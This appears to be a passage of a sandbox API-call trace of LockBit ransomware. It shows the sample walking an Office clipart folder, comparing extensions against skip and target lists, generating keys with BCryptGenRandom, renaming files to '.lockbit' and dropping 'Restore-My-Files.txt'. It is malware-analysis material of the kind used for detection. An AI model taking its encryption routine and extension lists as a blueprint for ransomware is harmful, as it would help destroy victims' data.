lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.753] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.753] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.753] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF.lockbit") returned 72 [0138.753] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105348.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0138.754] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.754] malloc (_Size=0x40068) returned 0x3ef0008 [0138.754] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=17060) returned 1 [0138.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.754] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0138.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.755] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0138.755] ReadFile (in: hFile=0x338, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.757] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.757] malloc (_Size=0xa6) returned 0x77d7a8 [0138.758] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.758] free (_Block=0x77d7a8) [0138.758] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.758] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.758] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.759] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x229c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105360.WMF", cAlternateFileName="")) returned 1 [0138.759] lstrcmpiW (lpString1=".", lpString2="J0105360.WMF") returned -1 [0138.759] lstrcmpiW (lpString1="..", lpString2="J0105360.WMF") returned -1 [0138.759] PathFindExtensionW (pszPath="J0105360.WMF") returned=".WMF" [0138.759] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.759] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.760] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.760] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105360.WMF") returned 1 [0138.761] lstrcmpiW (lpString1="ntldr", lpString2="J0105360.WMF") returned 1 [0138.761] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105360.WMF") returned 1 [0138.761] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105360.WMF") returned -1 [0138.761] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105360.WMF") returned -1 [0138.761] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105360.WMF") returned 1 [0138.761] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105360.WMF") returned -1 [0138.761] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.761] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned=".WMF" [0138.761] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.761] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.761] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.762] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.762] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF.lockbit") returned 72 [0138.762] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105360.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0138.766] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.766] malloc (_Size=0x40068) returned 0x3d70450 [0138.766] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=8860) returned 1 [0138.766] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.767] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0138.767] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.767] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0138.767] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.769] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.770] malloc (_Size=0xa6) returned 0x77d7a8 [0138.770] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.771] free (_Block=0x77d7a8) [0138.771] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.771] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.771] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.771] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x305c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105368.WMF", cAlternateFileName="")) returned 1 [0138.771] lstrcmpiW (lpString1=".", lpString2="J0105368.WMF") returned -1 [0138.771] lstrcmpiW (lpString1="..", lpString2="J0105368.WMF") returned -1 [0138.771] PathFindExtensionW (pszPath="J0105368.WMF") returned=".WMF" [0138.771] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.771] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.772] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.772] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105368.WMF") returned 1 [0138.773] lstrcmpiW (lpString1="ntldr", lpString2="J0105368.WMF") returned 1 [0138.773] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105368.WMF") returned 1 [0138.773] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105368.WMF") returned -1 [0138.773] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105368.WMF") returned -1 [0138.773] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105368.WMF") returned 1 [0138.773] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105368.WMF") returned -1 [0138.773] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.773] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned=".WMF" [0138.773] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.773] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.773] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.774] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.774] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.774] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.774] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.774] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.774] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.774] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.774] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.774] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.774] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.774] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF.lockbit") returned 72 [0138.774] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105368.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0138.783] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.783] malloc (_Size=0x40068) returned 0x3df0008 [0138.783] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12380) returned 1 [0138.783] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.784] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.784] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.785] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.785] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.787] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.787] malloc (_Size=0xa6) returned 0x77d7a8 [0138.787] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.788] free (_Block=0x77d7a8) [0138.788] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.788] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.788] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.788] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1364, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105376.WMF", cAlternateFileName="")) returned 1 [0138.788] lstrcmpiW (lpString1=".", lpString2="J0105376.WMF") returned -1 [0138.788] lstrcmpiW (lpString1="..", lpString2="J0105376.WMF") returned -1 [0138.788] PathFindExtensionW (pszPath="J0105376.WMF") returned=".WMF" [0138.788] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.788] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.788] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.788] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.788] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.789] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.789] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.790] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 